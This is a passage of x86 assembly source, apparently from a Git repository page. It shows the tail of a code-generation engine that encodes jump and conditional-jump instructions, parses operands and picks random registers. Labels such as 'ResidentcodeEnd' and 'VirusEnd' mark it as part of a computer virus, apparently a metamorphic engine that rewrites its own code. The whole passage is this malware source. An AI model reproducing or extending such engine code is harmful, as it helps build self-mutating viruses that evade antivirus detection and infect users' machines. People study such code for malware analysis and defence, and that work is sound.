cmp ebx,8
jz DefaultProc1Label1
mov eax,[ecx*4+RegistersBitValue+ebp]
lea edx,[Instruction+ebp]
pop ebx
or al,byte ptr [ebx+2]
mov [edx],eax
call GetOther
mov [edx+1],eax
mov [InstructionLength+ebp],5
jmp OutputInstruction
DefaultProc1:
push ebx
call ReadOperands
call SetDirectionBit
call FetchOpcode
DefaultProc1Label1:
pop ebx
add ebx,eax
movzx ecx,byte ptr [ebx]
inc ecx
dec eax
jnz Label41
mov ch,byte ptr [ebx+2]
shl ch,3
Label41:
or [Instruction+ebp],ecx
inc [InstructionLength+ebp]
dec eax
jz CopyDataToInstruction
call FixAddresses
jmp OutputInstruction
CopyDataToInstruction:
call GetOther
lea ebx,[Instruction+ebp]
add ebx,[InstructionLength+ebp]
mov [ebx],eax
add [InstructionLength+ebp],4
jmp OutputInstruction
;-JMP-------Jump
;Near,8-bit |1|1|1|0|1|0|1|1| 8-bit Displacement
;Near,Direct |1|1|1|0|1|0|0|1| Full Displacement
;Near,Indirect |1|1|1|1|1|1|1|1| |mod|1|0|0| R/M |
JmpProc:
call GetOperand
xor ecx,ecx
test ebx,ebx
jz JumpIsIndirect
mov ebx,[eax*4+RegistersBitValue+ebp]
mov al,0ffh
stosb
mov eax,ebx
or eax,00100000b
stosb
ret
JumpIsIndirect:
mov ebx,[SavedOffsets+ebp+eax]
sub ebx,edi
add ebx,4
test ebx,0fffffff8h
jz OutPutSmallJump
ret
JxxProc:
movzx edx,byte ptr [ebx]
push edx
call GetOperand
pop edx
mov ebx,[SavedOffsets+ebp+eax]
sub ebx,edi
add ebx,4
test ebx,0fffffff8h
jz OutPutSmallJump
mov al,0fh
stosb
mov al,10000000b
or eax,edx
stosb
sub ebx,6+4
mov eax,ebx
stosd
ret
OutPutSmallJump:
mov al,01110000b
or eax,edx
stosb
mov eax,ebx
sub eax,2+4
stosb
ret
ret
GetOperand:
xor edx,edx
mov al,byte ptr [esi]
cmp al,'['
setz dl
mov ecx,edx
add esi,edx
shl edx,3
mov ebx,edx ; ebx = 0 or 8
lodsb
cmp al,'S' ; A variable
jnz Label53
mov edx,[PointerToDataSlack+ebp]
lodsd
mov eax,[edx+eax*4]
add esi,ecx
xor edx,edx
ret
Label53:
cmp al,'R'
setz dl
shl edx,2
add ebx,edx ; ebx = ebx + (0 or 4)
test edx,edx ; is value
jz ReadValue
xor eax,eax
lodsb ; read register
cmp al,'X'
jz GetRandomReg
sub eax,'0'
add esi,ecx
ret
ReadValue:
lodsd
add esi,ecx
ret
Return:
ret
AsciiToNum:
xor eax,eax
lodsb
sub eax,'0'
ret
ResidentcodeEnd:
VirusEnd:
_rsrc ends
end Main
Reference in New Issue View Git Blame Copy Permalink